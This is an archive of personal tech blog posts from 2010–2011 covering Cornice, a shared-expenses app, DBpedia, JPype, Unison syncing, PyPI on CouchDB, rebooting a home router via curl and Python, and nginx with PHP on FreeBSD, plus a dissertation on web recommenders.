@service.get(validator=is_awesome)
def get1(request):
    return {"test": request.validated['awesome']}

The output would look like this:

curl http://127.0.0.1:5000/service?awesome=yeah
{"test": "awesome yeah"}

Dealing with “Accept” headers

The HTTP spec defines a Accept header the client can send so the response is encoded the right way. A resource, available at an URL, can be available in different formats. This is especially true for web services.

Cornice can help you dealing with this. The services you define can tell which Content-Type values they can deal with and this will be checked against the Accept headers sent by the client.

Let’s refine a bit our previous example, by specifying which content-types are supported, using the accept parameter:

@service.get(validator=is_awesome, accept=("application/json", "text/json"))
def get1(request):
    return {"test": "yay!"}

Now, if you specifically ask for XML, Cornice will throw a 406 with the list of accepted Content-Type values:

$ curl -vH "Accept: application/xml" http://127.0.0.1:5000/service
> GET /service HTTP/1.1
> Host: 127.0.0.1:5000
> Accept: application/xml
>
< HTTP/1.0 406 Not Acceptable
< Content-Type: application/json; charset=UTF-8
< Content-Length: 33
<
["application/json", "text/json"]

Building your documentation automatically

writing documentation for web services can be painful, especially when your services evolve. Cornice provides a sphinx directive to automatically document your API in your docs.

rst
.. services::
   :package: coolapp
   :service: quote

Here is an example of what a generated page looks like: http://packages.python.org/cornice/exampledoc.html

Yay! How can I get it?

We just cut a 0.4 release, so it’s available at http://pypi.python.org/pypi/cornice You can install it easily using pip, for instance:

$ pip install cornice

You can also have a look at the documentation at http://packages.python.org/cornice/

What’s next?

We try to make our best to find how Cornice can help you build better web services. Cool features we want for the future include the automatic publication of a static definition of the services, so it can be used by clients to discover services in a nice way.

Of course, we are open to all your ideas and patches! If you feel haskish and want to see the sources, go grab them on github , commit and send us a pull request!

How are you handling your shared expenses?

2011-10-15T00:00:00+02:00

TL;DR: We’re kick-starting a new application to manage your shared expenses. Have a look at http://ihatemoney.notmyidea.org

As a student, I lived in a lot of different locations, and the majority of them had something in common: I lived with others. It usually was a great experience (and I think I will continue to live with others). Most of the time, we had to spend some time each month to compute who had to pay what to the others.

I wanted to create a pet project using flask, so I wrote a little (\~150 lines) flask application to handle this. It worked out pretty well for my housemates and me, and as we had to move into different locations, one of them asked me if he could continue to use it for the year to come.

I said yes and gave it some more thoughts: We probably aren’t the only ones interested by such kind of software. I decided to extend a bit more the software to have a concept of projects and persons (the list of persons was hard-coded in the first time, boooh!).

I then discussed with a friend of mine, who was excited about it and wanted to learn python. Great! That’s a really nice way to get started. Some more friends were also interested in it and contributed some features and provided feedback (thanks Arnaud and Quentin!)

Since that, the project now support multiple languages and provides a REST API (android and iphone apps in the tubes!), into other things. There is no need to register for an account or whatnot, just enter a project name, a secret code and a contact email, invite friends and that’s it (this was inspired by doodle)!

You can try the project at http://ihatemoney.notmyidea.org for now, and the code lives at https://github.com/spiral-project/ihatemoney/.

Features

In the wild, currently, there already are some implementations of this shared budget manager thing. The fact is that most of them are either hard to use, with a too much fancy design or simply trying to do too much things at once.

No, I don’t want my budget manager to make my shopping list, or to run a blog for me, thanks. I want it to let me focus on something else. Keep out of my way.

No user registration

You don’t need to register an account on the website to start using it. You just have to create a project, set a secret code for it, and give both the url and the code to the people you want to share it with (or the website can poke them for you).

Keeping things simple

“Keep It Simple, Stupid” really matches our philosophy here: you want to add a bill? Okay. Just do it. You just have to enter who paid, for who, how much, and a description, like you would have done when you’re back from the farmer’s market on raw paper.

No categories

Some people like to organise their stuff into different “categories”: leisure, work, eating, etc. That’s not something I want (at least to begin with).

I want things to be simple. Got that? Great. Just add your bills!

Balance

One of the most useful thing is to know what’s your “balance” compared to others. In other words, if you’re negative, you owe money, if you’re positive, you have to receive money. This allows you to dispatch who has to pay for the next thing, in order to re-equilibrate the balance.

Additionally, the system is able to compute for you who has to give how much to who, in order to reduce the number of transactions needed to restore the balance.

API

All of what’s possible to do with the standard web interface is also available through a REST API. I developed a simple REST toolkit for flask for this (and I should release it!).

Interested?

This project is open source. All of us like to share what we are doing and would be happy to work with new people and implement new ideas. If you have a nice idea about this, if you want to tweak it or to fill bugs. Don’t hesitate a second! The project lives at http://github.com/spiral-project/ihatemoney/

Using dbpedia to get languages influences

2011-08-16T00:00:00+02:00

While browsing the Python’s wikipedia page, I found information about the languages influenced by python, and the languages that influenced python itself.

Well, that’s kind of interesting to know which languages influenced others, it could even be more interesting to have an overview of the connexion between them, keeping python as the main focus.

This information is available on the wikipedia page, but not in a really exploitable format. Hopefully, this information is provided into the information box present on the majority of wikipedia pages. And… guess what? there is project with the goal to scrap and index all this information in a more queriable way, using the semantic web technologies.

Well, you may have guessed it, the project in question in dbpedia, and exposes information in the form of RDF triples, which are way more easy to work with than simple HTML.

For instance, let’s take the page about python: http://dbpedia.org/page/Python_%28programming_language%29

The interesting properties here are “Influenced” and “InfluencedBy”, which allows us to get a list of languages. Unfortunately, they are not really using all the power of the Semantic Web here, and the list is actually a string with coma separated values in it.

Anyway, we can use a simple rule: All wikipedia pages of programming languages are either named after the name of the language itself, or suffixed with “( programming language)”, which is the case for python.

So I’ve built a tiny script to extract the information from dbpedia and transform them into a shiny graph using graphviz.

After a nice:

$ python get_influences.py python dot | dot -Tpng > influences.png

The result is the following graph (see it directly here)

While reading this diagram, keep in mind that it is a) not listing all the languages and b) keeping a python perspective.

This means that you can trust the scheme by following the arrows from python to something and from something to python, it is not trying to get the matching between all the languages at the same time to keep stuff readable.

It would certainly be possible to have all the connections between all languages (and the resulting script would be easier) to do so, but the resulting graph would probably be way less readable.

You can find the script on my github account. Feel free to adapt it for whatever you want if you feel hackish.

Pelican, 9 months later

2011-07-25T00:00:00+02:00

Back in October, I released pelican, a little piece of code I wrote to power this weblog. I had simple needs: I wanted to be able to use my text editor of choice (vim), a vcs (mercurial) and restructured text. I started to write a really simple blog engine in something like a hundred python lines and released it on github.

And people started contributing. I wasn’t at all expecting to see people interested in such a little piece of code, but it turned out that they were. I refactored the code to make it evolve a bit more by two times and eventually, in 9 months, got 49 forks, 139 issues and 73 pull requests.

Which is clearly awesome.

I pulled features such as translations, tag clouds, integration with different services such as twitter or piwik, import from dotclear and rss, fixed a number of mistakes and improved a lot the codebase. This was a proof that there is a bunch of people that are willing to make better softwares just for the sake of fun.

Thank you, guys, you’re why I like open source so much.

Using JPype to bridge python and Java

2011-06-11T00:00:00+02:00

Java provides some interesting libraries that have no exact equivalent in python. In my case, the awesome boilerpipe library allows me to remove uninteresting parts of HTML pages, like menus, footers and other “boilerplate” contents.

Boilerpipe is written in Java. Two solutions then: using java from python or reimplement boilerpipe in python. I will let you guess which one I chosen, meh.

JPype allows to bridge python project with java libraries. It takes another point of view than Jython: rather than reimplementing python in Java, both languages are interfacing at the VM level. This means you need to start a VM from your python script, but it does the job and stay fully compatible with Cpython and its C extensions.

First steps with JPype

Once JPype installed (you’ll have to hack a bit some files to integrate seamlessly with your system) you can access java classes by doing something like that:

import jpype
jpype.startJVM(jpype.getDefaultJVMPath())

# you can then access to the basic java functions
jpype.java.lang.System.out.println("hello world")

# and you have to shutdown the VM at the end
jpype.shutdownJVM()

Okay, now we have a hello world, but what we want seems somehow more complex. We want to interact with java classes, so we will have to load them.

Interfacing with Boilerpipe

To install boilerpipe, you just have to run an ant script:

$ cd boilerpipe
$ ant

Here is a simple example of how to use boilerpipe in Java, from their sources

package de.l3s.boilerpipe.demo;
import java.net.URL;
import de.l3s.boilerpipe.extractors.ArticleExtractor;

public class Oneliner {
    public static void main(final String[] args) throws Exception {
        final URL url = new URL("http://notmyidea.org");
        System.out.println(ArticleExtractor.INSTANCE.getText(url));
    }
}

To run it:

$ javac -cp dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar src/demo/de/l3s/boilerpipe/demo/Oneliner.java
$ java -cp src/demo:dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar de.l3s.boilerpipe.demo.Oneliner

Yes, this is kind of ugly, sorry for your eyes. Let’s try something similar, but from python

import jpype

# start the JVM with the good classpaths
classpath = "dist/boilerpipe-1.1-dev.jar:lib/nekohtml-1.9.13.jar:lib/xerces-2.9.1.jar"
jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.class.path=%s" % classpath)

# get the Java classes we want to use
DefaultExtractor = jpype.JPackage("de").l3s.boilerpipe.extractors.DefaultExtractor

# call them !
print DefaultExtractor.INSTANCE.getText(jpype.java.net.URL("http://blog.notmyidea.org"))

And you get what you want.

I must say I didn’t thought it could work so easily. This will allow me to extract text content from URLs and remove the boilerplate text easily for infuse (my master thesis project), without having to write java code, nice!

Un coup de main pour mon mémoire !

2011-05-25T00:00:00+02:00

Ça y est, bientôt la fin. LA FIN. La fin des études, et le début du reste. En attendant je bosse sur mon mémoire de fin d’études et j’aurais besoin d’un petit coup de main.

Mon mémoire porte sur les systèmes de recommandation. Pour ceux qui connaissent last.fm, je fais quelque chose de similaire mais pour les sites internet: en me basant sur ce que vous visitez quotidiennement et comment vous le visitez (quelles horaires, quelle emplacement géographique, etc.) je souhaites proposer des liens qui vous intéresseront potentiellement, en me basant sur l’avis des personnes qui ont des profils similaires au votre.

Le projet est loin d’être terminé, mais la première étape est de récupérer des données de navigation, idéalement beaucoup de données de navigation. Donc si vous pouvez me filer un coup de main je vous en serais éternellement reconnaissant (pour ceux qui font semblant de pas comprendre, entendez “tournée générale”).

J’ai créé un petit site web (en anglais) qui résume un peu le concept, qui vous propose de vous inscrire et de télécharger un plugin firefox qui m’enverra des information sur les sites que vous visitez (si vous avez l’habitude d’utiliser chrome vous pouvez considérer de switcher à firefox4 pour les deux prochains mois pour me filer un coup de main). Il est possible de désactiver le plugin d’un simple clic si vous souhaitez garder votre vie privée privée ;-)

Le site est par là: http://infuse.notmyidea.org. Une fois le plugin téléchargé et le compte créé il faut renseigner vos identifiants dans le plugin en question, et c’est tout!

A votre bon cœur ! Je récupérerais probablement des données durant les 2 prochains mois pour ensuite les analyser correctement.

Merci pour votre aide !

Analyse users’ browsing context to build up a web recommender

2011-04-01T00:00:00+02:00

No, this is not an april’s fool ;)

Wow, it’s been a long time. My year in Oxford is going really well. I realized few days ago that the end of the year is approaching really quickly. Exams are coming in one month or such and then I’ll be working full time on my dissertation topic.

When I learned we’ll have about 6 month to work on something, I first thought about doing a packaging related stuff, but finally decided to start something new. After all, that’s the good time to learn.

Since a long time, I’m being impressed by the last.fm recommender system. They’re scrobbling the music I listen to since something like 5 years now and the recommendations they’re doing are really nice and accurate (I discovered a lot of great artists listening to the “neighbour radio”.) (by the way, here is my lastfm account)

So I decided to work on recommender systems, to better understand what is it about.

Recommender systems are usually used to increase the sales of products (like Amazon.com does) which is not really what I’m looking for (The one who know me a bit know I’m kind of sick about all this consumerism going on).

Actually, the most simple thing I thought of was the web: I’m browsing it quite every day and each time new content appears. I’ve stopped to follow my feed reader because of the information overload, and reduced drastically the number of people I follow on twitter.

Too much information kills the information.

You shall got what will be my dissertation topic: a recommender system for the web. Well, such recommender systems already exists, so I will try to add contextual information to them: you’re probably not interested by the same topics at different times of the day, or depending on the computer you’re using. We can also probably make good use of the way you browse to create groups into the content you’re browsing (or even use the great firefox4 tab group feature).

There is a large part of concerns to have about user’s privacy as well.

Here is my proposal (copy/pasted from the one I had to do for my master)

Introduction and rationale

Nowadays, people surf the web more and more often. New web pages are created each day so the amount of information to retrieve is more important as the time passes. These users uses the web in different contexts, from finding cooking recipes to technical articles.

A lot of people share the same interest to various topics, and the quantity of information is such than it’s really hard to triage them efficiently without spending hours doing it. Firstly because of the huge quantity of information but also because the triage is something relative to each person. Although, this triage can be facilitated by fetching the browsing information of all particular individuals and put the in perspective.

Machine learning is a branch of Artificial Intelligence (AI) which deals with how a program can learn from data. Recommendation systems are a particular application area of machine learning which is able to recommend things (links in our case) to the users, given a particular database containing the previous choices users have made.

This browsing information is currently available in browsers. Even if it is not in a very usable format, it is possible to transform it to something useful. This information gold mine just wait to be used. Although, it is not as simple as it can seems at the first approach: It is important to take care of the context the user is in while browsing links. For instance, It’s more likely that during the day, a computer scientist will browse computing related links, and that during the evening, he browse cooking recipes or something else.

Page contents are also interesting to analyse, because that’s what people browse and what actually contain the most interesting part of the information. The raw data extracted from the browsing can then be translated into something more useful (namely tags, type of resource, visit frequency, navigation context etc.)

The goal of this dissertation is to create a recommender system for web links, including this context information.

At the end of the dissertation, different pieces of software will be provided, from raw data collection from the browser to a recommendation system.

Background Review

This dissertation is mainly about data extraction, analysis and recommendation systems. Two different research area can be isolated: Data preprocessing and Information filtering.

The first step in order to make recommendations is to gather some data. The more data we have available, the better it is (T. Segaran, 2007). This data can be retrieved in various ways, one of them is to get it directly from user’s browsers.

Data preparation and extraction

The data gathered from browsers is basically URLs and additional information about the context of the navigation. There is clearly a need to extract more information about the meaning of the data the user is browsing, starting by the content of the web pages.

Because the information provided on the current Web is not meant to be read by machines (T. Berners Lee, 2001) there is a need of tools to extract meaning from web pages. The information needs to be preprocessed before stored in a machine readable format, allowing to make recommendations (Choochart et Al, 2004).

Data preparation is composed of two steps: cleaning and structuring ( Castellano et Al, 2007). Because raw data can contain a lot of un-needed text (such as menus, headers etc.) and need to be cleaned prior to be stored. Multiple techniques can be used here and belongs to boilerplate removal and full text extraction (Kohlschütter et Al, 2010).

Then, structuring the information: category, type of content (news, blog, wiki) can be extracted from raw data. This kind of information is not clearly defined by HTML pages so there is a need of tools to recognise them.

Some context-related information can also be inferred from each resource. It can go from the visit frequency to the navigation group the user was in while browsing. It is also possible to determine if the user “liked” a resource, and determine a mark for it, which can be used by information filtering a later step (T. Segaran, 2007).

At this stage, structuring the data is required. Storing this kind of information in RDBMS can be a bit tedious and require complex queries to get back the data in an usable format. Graph databases can play a major role in the simplification of information storage and querying.

Information filtering

To filter the information, three techniques can be used (Balabanovic et Al, 1997):

The content-based approach states that if an user have liked something in the past, he is more likely to like similar things in the future. So it’s about establishing a profile for the user and compare new items against it.
The collaborative approach will rather recommend items that other similar users have liked. This approach consider only the relationship between users, and not the profile of the user we are making recommendations to.
the hybrid approach, which appeared recently combine both of the previous approaches, giving recommendations when items score high regarding user’s profile, or if a similar user already liked it.

Grouping is also something to consider at this stage (G. Myatt, 2007). Because we are dealing with huge amount of data, it can be useful to detect group of data that can fit together. Data clustering is able to find such groups (T. Segaran, 2007).

References:

Balabanović, M., & Shoham, Y. (1997). Fab: content-based, collaborative recommendation. Communications of the ACM, 40(3), 66–72. ACM. Retrieved March 1, 2011, from http://portal.acm.org/citation.cfm?id=245108.245124&;.
Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The semantic web: Scientific american. Scientific American, 284(5), 34–43. Retrieved November 21, 2010, from http://www.citeulike.org/group/222/article/1176986.
Castellano, G., Fanelli, A., & Torsello, M. (2007). LODAP: a LOg DAta Preprocessor for mining Web browsing patterns. Proceedings of the 6th Conference on 6th WSEAS Int. Conf. on Artificial Intelligence, Knowledge Engineering and Data Bases-Volume 6 (p. 12–17). World Scientific and Engineering Academy and Society (WSEAS). Retrieved March 8, 2011, from http://portal.acm.org/citation.cfm?id=1348485.1348488.
Kohlschutter, C., Fankhauser, P., & Nejdl, W. (2010). Boilerplate detection using shallow text features. Proceedings of the third ACM international conference on Web search and data mining (p. 441–450). ACM. Retrieved March 8, 2011, from http://portal.acm.org/citation.cfm?id=1718542.
Myatt, G. J.(2007). Making Sense of Data: A Practical Guide to Exploratory Data Analysis and Data Mining.
Segaran, T. (2007). Collective Intelligence.

Privacy

The first thing that’s come to people minds when it comes to process their browsing data is privacy. People don’t want to be stalked. That’s perfectly right, and I don’t either.

But such a system don’t have to deal with people identities. It’s completely possible to process completely anonymous data, and that’s probably what I’m gonna do.

By the way, if you have interesting thoughts about that, if you do know projects that do seems related, fire the comments !

What’s the plan ?

There is a lot of different things to explore, especially because I’m a complete novice in that field.

I want to develop a firefox plugin, to extract the browsing informations ( still, I need to know exactly which kind of informations to retrieve). The idea is to provide some raw browsing data, and then to transform it and to store it in the better possible way.
Analyse how to store the informations in a graph database. What can be the different methods to store this data and to visualize the relationship between different pieces of data? How can I define the different contexts, and add those informations in the db?
Process the data using well known recommendation algorithms. Compare the results and criticize their value.

There is plenty of stuff I want to try during this experimentation:

I want to try using Geshi to visualize the connexion between the links, and the contexts
Try using graph databases such as Neo4j
Having a deeper look at tools such as scikit.learn (a machine learning toolkit in python)
Analyse web pages in order to categorize them. Processing their contents as well, to do some keyword based classification will be done.

Lot of work on its way, yay !

Working directly on your server? How to backup and sync your dev environment with unison

2011-03-16T00:00:00+01:00

I have a server running freebsd since some time now, and was wondering about the possibility to directly have a development environment ready to use when I get a internet connexion, even if I’m not on my computer.

Since I use vim to code, and spend most of my time in a console while developing, it’s possible to work via ssh, from everywhere.

The only problem is the synchronisation of the source code, config files etc. from my machine to the server.

Unison provides an interesting way to synchronise two folders, even over a network. So let’s do it !

Creating the jail

In case you don’t use FreeBSD, you can skip this section.

# I have a flavour jail named default
$ ezjail-admin -f default workspace.notmyidea.org 172.19.1.6
$ ezjail-admin start workspace.notmyidea.org

In my case, because the “default” flavour contains already a lot of interesting things, my jail come already setup with ssh, bash and vim for instance, but maybe you’ll need it in your case.

I want to be redirected to the ssh of the jail when I connect to the host with the 20006 port. Add lines in /etc/pf.conf:

    workspace_jail="172.19.1.6"
    rdr on $ext_if proto tcp from any to $ext_ip port 20006 -> $workspace_jail port 22

Reload packet filter rules

$ /etc/rc.d/pf reload

Working with unison

Now that we’ve set up the jail. Set up unison on the server and on your client. Unison is available on the freebsd ports so just install it

$ ssh notmyidea.org -p 20006
$ make -C /usr/ports/net/unison-nox11 config-recursive
$ make -C /usr/ports/net/unison-nox11 package-recursive

Install as well unison on your local machine. Double check to install the same version on the client and on the server. Ubuntu contains the 2.27.57 as well as the 2.32.52.

Check that unison is installed and reachable via ssh from your machine

$ ssh notmyidea.org -p 20006 unison -version
unison version 2.27.157
$ unison -version
unison version 2.27.57

Let sync our folders

The first thing I want to sync is my vim configuration. Well, it’s already in a git repository but let’s try to use unison for it right now.

I have two machines then: workspace, the jail, and ecureuil my laptop.

unison .vim ssh://notmyidea.org:20006/.vim
unison .vimrc ssh://notmyidea.org:20006/.vimrc

It is also possible to put all the informations in a config file, and then to only run unison. (fire up vim \~/.unison/default.prf.

Here is my config:

    root = /home/alexis
    root = ssh://notmyidea.org:20006

    path = .vimrc
    path = dotfiles
    path = dev

    follow = Name *

My vimrc is in fact a symbolic link on my laptop, but I don’t want to specify each of the links to unison. That’s why the follow = Name * is for.

The folders you want to synchronize are maybe a bit large. If so, considering others options such as rsync for the first import may be a good idea (I enjoyed my university huge upload bandwith to upload 2GB in 20mn ;)

Run the script frequently

Once that done, you just need to run the unison command line some times when you want to sync your two machines. I’ve wrote a tiny script to get some feedback from the sync:

import os
from datetime import datetime

DEFAULT_LOGFILE = "~/unison.log"
PROGRAM_NAME = "Unison syncer"

def sync(logfile=DEFAULT_LOGFILE, program_name=PROGRAM_NAME):
    # init
    display_message = True
    error = False

    before = datetime.now()
    # call unison to make the sync
    os.system('unison -batch > {0}'.format(logfile))

    # get the duration of the operation
    td = datetime.now() - before
    delta = (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6

    # check what was the last entry in the log
    log = open(os.path.expanduser(logfile))
    lines = log.readlines()
    if 'No updates to propagate' in lines[-1]:
        display_message = False
    else:
        output = [l for l in lines if "Synchronization" in l]

        message = output[-1]
        message += " It took {0}s.".format(delta)

    if display_message:
        os.system('notify-send -i {2} "{0}" "{1}"'.format(program_name, message,
            'error' if error else 'info'))

if __name__ == "__main__":
    sync()

This is probably perfectible, but that does the job.

Last step is to tell you machine to run that frequently. That’s what crontab is made for, so let’s crontab -e:

    $ * */3 * * * . ~/.Xdbus; /usr/bin/python /home/alexis/dev/python/unison-syncer/sync.py

The \~/.Xdbus allows cron to communicate with your X11 session. Here is its content.

#!/bin/bash

# Get the pid of nautilus
nautilus_pid=$(pgrep -u $LOGNAME -n nautilus)

# If nautilus isn't running, just exit silently
if [ -z "$nautilus_pid" ]; then
exit 0
fi

# Grab the DBUS_SESSION_BUS_ADDRESS variable from nautilus's environment
eval $(tr '\0' '\n' < /proc/$nautilus_pid/environ | grep '^DBUS_SESSION_BUS_ADDRESS=')

# Check that we actually found it
if [ -z "$DBUS_SESSION_BUS_ADDRESS" ]; then
echo "Failed to find bus address" >&2
exit 1
fi

# export it so that child processes will inherit it
export DBUS_SESSION_BUS_ADDRESS

And it comes from here.

A sync takes about 20s + the upload time on my machine, which stay acceptable for all of my developments.

Wrap up of the distutils2 paris’ sprint

2011-02-08T00:00:00+01:00

Finally, thanks to a bunch of people that helped me to pay my train and bus tickets, I’ve made it to paris for the distutils2 sprint.

They have been a bit more than 10 people to come during the sprint, and it was very productive. Here’s a taste of what we’ve been working on:

the datafiles, a way to specify and to handle the installation of files which are not python-related (pictures, manpages and so on).
mkgcfg, a tool to help you to create a setup.cfg in minutes (and with funny examples)
converters from setup.py scripts. We do now have a piece of code which reads your current setup.py file and fill in some fields in the setup.cfg for you.
a compatibility layer for distutils1, so it can read the setup.cfg you will wrote for distutils2 :-)
the uninstaller, so it’s now possible to uninstall what have been installed by distutils2 (see PEP 376)
the installer, and the setuptools compatibility layer, which will allow you to rely on setuptools’ based distributions (and there are plenty of them!)
The compilers, so they are more flexible than they were. Since that’s an obscure part of the code for distutils2 commiters (it comes directly from the distutils1 ages), having some guys who understood the problematics here was a must.

Some people have also tried to port their packaging from distutils1 to distutils2. They have spotted a number of bugs and made some improvements to the code, to make it more friendly to use.

I’m really pleased to see how newcomers went trough the code, and started hacking so fast. I must say it wasn’t the case when we started to work on distutils1 so that’s a very good point: people now can hack the code quicker than they could before.

Some of the features here are not completely finished yet, but are on the tubes, and will be ready for a release (hopefully) at the end of the week.

Big thanks to logilab for hosting (and sponsoring my train ticket) and providing us food, and to bearstech for providing some money for breakfast and bears^Wbeers.

Again, a big thanks to all the people who gave me money to pay the transport, I really wasn’t expecting such thing to happen :-)

PyPI on CouchDB

2011-01-20T00:00:00+01:00

By now, there are two ways to retrieve data from PyPI (the Python Package Index). You can both rely on xml/rpc or on the “simple” API. The simple API is not so simple to use as the name suggest, and have several existing drawbacks.

Basically, if you want to use informations coming from the simple API, you will have to parse web pages manually, to extract informations using some black vodoo magic. Badly, magic have a price, and it’s sometimes impossible to get exactly the informations you want to get from this index. That’s the technique currently being used by distutils2, setuptools and pip.

On the other side, while XML/RPC is working fine, it’s requiring extra work to the python servers each time you request something, which can lead to some outages from time to time. Also, it’s important to point out that, even if PyPI have a mirroring infrastructure, it’s only for the so-called simple API, and not for the XML/RPC.

CouchDB

Here comes CouchDB. CouchDB is a document oriented database, that knows how to speak REST and JSON. It’s easy to use, and provides out of the box a replication mechanism.

So, what ?

Hmm, I’m sure you got it. I’ve wrote a piece of software to link informations from PyPI to a CouchDB instance. Then you can replicate all the PyPI index with only one HTTP request on the CouchDB server. You can also access the informations from the index directly using a REST API, speaking json. Handy.

So PyPIonCouch is using the PyPI XML/RPC API to get data from PyPI, and generate records in the CouchDB instance.

The final goal is to avoid to rely on this “simple” API, and rely on a REST insterface instead. I have set up a couchdb server on my server, which is available at http://couchdb.notmyidea.org/_utils/database.html?pypi.

There is not a lot to see there for now, but I’ve done the first import from PyPI yesterday and all went fine: it’s possible to access the metadata of all PyPI projects via a REST interface. Next step is to write a client for this REST interface in distutils2.

Example

For now, you can use pypioncouch via the command line, or via the python API.

Using the command line

You can do something like that for a full import. This will take long, because it’s fetching all the projects at pypi and importing their metadata:

$ pypioncouch --fullimport http://your.couchdb.instance/

If you already have the data on your couchdb instance, you can just update it with the last informations from pypi. However, I recommend to just replicate the principal node, hosted at http://couchdb.notmyidea.org/pypi/, to avoid the duplication of nodes:

$ pypioncouch --update http://your.couchdb.instance/

The principal node is updated once a day by now, I’ll try to see if it’s enough, and ajust with the time.

Using the python API

You can also use the python API to interact with pypioncouch:

>>> from pypioncouch import XmlRpcImporter, import_all, update
>>> full_import()
>>> update()

What’s next ?

I want to make a couchapp, in order to navigate PyPI easily. Here are some of the features I want to propose:

List all the available projects
List all the projects, filtered by specifiers
List all the projects by author/maintainer
List all the projects by keywords
Page for each project.
Provide a PyPI “Simple” API equivalent, even if I want to replace it, I do think it will be really easy to setup mirrors that way, with the out of the box couchdb replication

I also still need to polish the import mechanism, so I can directly store in couchdb:

The OPML files for each project
The upload_time as couchdb friendly format (list of int)
The tags as lists (currently it’s only a string separated by spaces

The work I’ve done by now is available on https://bitbucket.org/ametaireau/pypioncouch/. Keep in mind that it’s still a work in progress, and everything can break at any time. However, any feedback will be appreciated !

Help me to go to the distutils2 paris’ sprint

2011-01-15T00:00:00+01:00

Edit: Thanks to logilab and some amazing people, I can make it to paris for the sprint. Many thanks to them for the support!

There will be a distutils2 sprint from the 27th to the 30th of january, thanks to logilab which will host the event.

You can find more informations about the sprint on the wiki page of the event (http://wiki.python.org/moin/Distutils/SprintParis).

I really want to go there but I’m unfortunately blocked in UK for money reasons. The cheapest two ways I’ve found is about £80, which I can’t afford. Following some advices on #distutils, I’ve set up a ChipIn account for that, so if some people want to help me making it to go there, they can give me some money that way.

I’ll probably work on the installer (to support old distutils and setuptools distributions) and on the uninstaller (depending on the first task). If I can’t make it to paris, I’ll hang around on IRC to give some help while needed.

If you want to contribute some money to help me go there, feel free to use this chipin page: http://ametaireau.chipin.com/distutils2-sprint-in-paris

Thanks for your support !

How to reboot your bebox using the CLI

2010-10-21T00:00:00+02:00

I’ve an internet connection which, for some obscure reasons, tend to be very slow from time to time. After rebooting the box (yes, that’s a hard solution), all the things seems to go fine again.

EDIT : Using grep

After a bit of reflexion, that’s also really easy to do using directly the command line tools curl, grep and tail (but really harder to read).

curl -X POST -u joel:joel http://bebox.config/cgi/b/info/restart/\?be\=0\&l0\=1\&l1\=0\&tid\=RESTART -d "0=17&2=`curl -u joel:joel http://bebox.config/cgi/b/info/restart/\?be\=0\&l0\=1\&l1\=0\&tid\=RESTART | grep -o "name='2' value='[0-9]\+" | grep -o "[0-9]\+" | tail -n 1`&1"

The Python version

Well, that’s not the optimal solution, that’s a bit “gruik”, but it works.

import urllib2
import urlparse
import re
import argparse

REBOOT_URL = '/b/info/restart/?be=0&l0=1&l1=0&tid=RESTART'
BOX_URL = 'http://bebox.config/cgi'

def open_url(url, username, password):
    passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    passman.add_password(None, url, username, password)
    authhandler = urllib2.HTTPBasicAuthHandler(passman)

    opener = urllib2.build_opener(authhandler)

    urllib2.install_opener(opener)

    return urllib2.urlopen(url).read()

def reboot(url, username, password):
    data = open_url(url, username, password)
    token = re.findall("name\=\\'2\\' value=\\'([0-9]+)\\'", data)[1]
    urllib2.urlopen(urllib2.Request(url=url, data='0=17&2=%s&1' % token))

if __file__ == '__main__':
    parser = argparse.ArgumentParser(description="""Reboot your bebox !""")

    parser.add_argument(dest='user', help='username')
    parser.add_argument(dest='password', help='password')
    parser.add_argument(boxurl='boxurl', default=BOX_URL, help='Base box url.  Default is %s' % BOX_URL)

    args = parser.parse_args()
    url = urlparse.urljoin(args.boxurl, REBOOT_URL)
    reboot(url, args.username, args.password)

Dynamically change your gnome desktop wallpaper

2010-10-11T00:00:00+02:00

In gnome, you can can use a XML file to have a dynamic wallpaper. It’s not so easy, and you can’t just tell: use the pictures in this folder to do so.

You can have a look to the git repository if you want: http://github.com/ametaireau/gnome-background-generator

Some time ago, I’ve made a little python script to ease that, and you can now use it too. It’s named “gnome-background-generator”, and you can install it via pip for instance.

shell
$ pip install gnome-background-generator

Then, you have just to use it this way:

shell
$ gnome-background-generator -p ~/Images/walls -s
/home/alexis/Images/walls/dynamic-wallpaper.xml generated

Here is a extract of the `—help`:

shell
$ gnome-background-generator --help
usage: gnome-background-generator [-h] [-p PATH] [-o OUTPUT]
                                  [-t TRANSITION_TIME] [-d DISPLAY_TIME] [-s]
                                  [-b]

A simple command line tool to generate an XML file to use for gnome
wallpapers, to have dynamic walls

optional arguments:
  -h, --help            show this help message and exit
  -p PATH, --path PATH  Path to look for the pictures. If no output is
                        specified, will be used too for outputing the dynamic-
                        wallpaper.xml file. Default value is the current
                        directory (.)
  -o OUTPUT, --output OUTPUT
                        Output filename. If no filename is specified, a
                        dynamic-wallpaper.xml file will be generated in the
                        path containing the pictures. You can also use "-" to
                        display the xml in the stdout.
  -t TRANSITION_TIME, --transition-time TRANSITION_TIME
                        Time (in seconds) transitions must last (default value
                        is 2 seconds)
  -d DISPLAY_TIME, --display-time DISPLAY_TIME
                        Time (in seconds) a picture must be displayed. Default
                        value is 900 (15mn)
  -s, --set-background  '''try to set the background using gnome-appearance-
                        properties
  -b, --debug

How to install NGINX + PHP 5.3 on FreeBSD.

2010-10-10T00:00:00+02:00

date
2010-10-10
category
tech

I’ve not managed so far to get completely rid of php, so here’s a simple reminder about how to install php on NGINX, for FreeBSD. Nothing hard, but that’s worse to have the piece of configuration somewhere !

# update the ports
$ portsnap fetch update

# install php5 port
$ make config-recursive -C /usr/ports/lang/php5-extensions
$ make package-recursive -C /usr/ports/lang/php5-extensions

# install nginx
$ make config-recursive -C /usr/ports/www/nginx-devel
$ make package-recursive -C /usr/ports/www/nginx-devel

Now we have all the dependencies installed, we need to configure a bit the server.

That’s a simple thing in fact, but it could be good to have something that will work without effort over time.

Here’s a sample of my configuration:

server {
    server_name ndd;
    set $path /path/to/your/files;
    root   $path;

    location / {
        index  index.php;
    }

    location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico|xml)$ {
      access_log        off;
      expires           30d;
    }

    location ~ .php$ {
        fastcgi_param  SCRIPT_FILENAME  $path$fastcgi_script_name;
        fastcgi_pass   backend;
        include fastcgi_params;
    }
}

upstream backend {
        server 127.0.0.1:9000;
}

And that’s it !

Pelican, a simple static blog generator in python

2010-10-06T00:00:00+02:00

